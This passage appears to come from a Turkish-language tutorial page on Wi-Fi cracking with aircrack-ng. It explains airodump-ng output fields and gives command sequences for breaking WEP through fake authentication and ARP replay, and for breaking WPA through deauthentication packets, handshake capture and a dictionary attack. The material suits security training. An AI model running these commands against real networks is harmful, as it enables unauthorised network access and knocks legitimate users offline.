<p><strong>PWR:</strong> Yayının sinyal gücü</p>
<p><strong>Beacon:</strong> Kablosuz yönetimi için kullanılan çeşitli yönetim paketlerinin
sayısı</p>
<p><strong>Data:</strong> Beacon harici geri kalan paketlerin sayısı</p>
<p><strong>CH:</strong> Hangi kanalda yayın yaptığını gösterir</p>
<p><strong>ENC:</strong> Şifreleme yöntemi</p>
<p><strong>CIPHER:</strong> Şifreleme türü. CCMP -&gt; AES</p>
<p><strong>AUTH:</strong> Önceden paylaşımlı anahtar(PSK), MGT veya OPEN gibi kimlik doğrulama
yöntemini gösterir</p>
<p><strong>ESSID:</strong> Kablosuz yayının ismi</p>
<p><strong>[!] airodump-ng -a parametresiyle sadece bağlı olan clientler
gösterilebilir</strong></p>
<hr />
<p><strong>WEP</strong></p>
<p>Üst taraftaki tablodan bu bilgiler elde edildikten sonra alt taraftaki tablodan
da kablosuz ağa bağlanmış veya bağlanmaya çalışan diğer cihazları görebiliriz.</p>
<p>Tek bir erişim noktasını dinlemek için kanal, mac adresi vermek yeterliyken
daha sonra şifreyi bulabilmek için -w parametresiyle trafiği kayıt edebiliriz.</p>
<pre><code>airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
</code></pre>
<p>Alınan paketlerin sayısını arttırmak için sahte bir oturumla arp paketlerini kullanarak şansımızı arttırabiliriz.</p>
<pre><code>aireplay-ng --fakeauth 1 wlp1s0mon -a #bssid
aireplay-ng --arpreplay wlp1s0mon -b #bssid
</code></pre>
<p>Yeterli pakete ulaşılması durumunda aircrack-ng kullanılarak kırılabilir.</p>
<pre><code>aircrack-ng pcap
</code></pre>
<hr />
<p><strong>WPA</strong></p>
<pre><code>airodump-ng -c #CH --bssid #00:00:00:00:00:00 -w pcap wlan0mon
</code></pre>
<p>Handshake yakalamak için deauth paketi gönderilebilir.</p>
<pre><code>aireplay-ng -0 100 -a #AccessPoint -c #Client wlan0mon
</code></pre>
<p>Dinlemeye başladıktan sonra <strong>WPA HANDSHAKE</strong> yakalandığında dinlemeyi bırakıp
oluşturulan pcap dosyasını aircrack ile sözlük saldırısı kullanılarak
kırılabilir.</p>

                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->
                        

                        

                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">
                

                
            </nav>

        </div>

        

        

        

        
        <script src="elasticlunr.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="mark.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="searcher.js" type="text/javascript" charset="utf-8"></script>
        

        <script src="clipboard.min.js" type="text/javascript" charset="utf-8"></script>
        <script src="highlight.js" type="text/javascript" charset="utf-8"></script>
        <script src="book.js" type="text/javascript" charset="utf-8"></script>

        <!-- Custom JS scripts -->
        

        
        
        <script type="text/javascript">
        window.addEventListener('load', function() {
            window.setTimeout(window.print, 100);
        });
        </script>
        
        

    </body>
</html>
